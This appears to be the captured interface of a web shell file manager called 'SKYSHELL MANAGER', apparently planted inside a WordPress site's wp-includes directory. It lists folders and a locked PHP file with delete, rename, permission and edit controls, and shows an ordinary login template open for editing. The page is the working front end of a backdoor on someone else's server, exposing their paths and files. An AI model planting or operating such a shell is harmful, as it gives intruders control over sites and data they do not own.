📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: login.tpl
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> {assign 'is_assets_minified' 1} <head> <title>Login</title> <link rel="shortcut icon" type="image/x-icon" href="{$root}favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow" /> <meta http-equiv="Content-Type" content="text/html;charset=utf-8" /> <link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Open+Sans:300,400,600,700,800"/> {if $is_assets_minified} <link rel="stylesheet" type="text/css" href="style/built-login.min.css?v=601" /> {else} <link rel="stylesheet" type="text/css" href="style-orb/css/font-awesome.css?v=601"/> <link rel="stylesheet" type="text/css" href="style/login-box.css?v=601" /> {/if} </head> <body> <form id="Form1" method="post"> <div align="center" style="padding: 100px 0 0 0px;"> {if $existingFiles} <div class="divMessage red"><br/>Security Warning: Please remove the following file{$existingFilesSuffix} from the server: {$existingFiles}</div> {/if} {if $permissionFiles} <div class="divMessage red"><br/>Security Warning: You have to reset permissions to 644 for the {$permissionFiles} file{$permissionFilesSuffix}</div> {/if} <div class="login-box"> <h2> </h2> <div class="login-box-name" style="margin-top:20px;">Username:</div> <div class="login-box-field" style="margin-top:20px;"> <input name="txtUsername" class="form-login" title="Username" value="" size="30" maxlength="255" /> </div> <div style="clear:both"></div> <div class="login-box-name">Password:</div> <div class="login-box-field"> <input name="txtPassword" type="password" class="form-login" title="Password" value="" size="30" maxlength="255" /> </div> <div style="clear:both"> </div> <button type="submit" name="btnSubmit_x" class="btn btn-success btn-lg"><i class="fa fa-check"></i> Login</button> <br/><br/> {if $showInvalidLogin} <div class="divMessage">Invalid login!</div> {/if} {if $showMessage || $smarty.session.MessageText|default:''} <div class="divMessage">{$messageText nofilter}{$smarty.session.MessageText|default:'' nofilter}</div> {/if} </div> </div> </form> </body> </html>
Save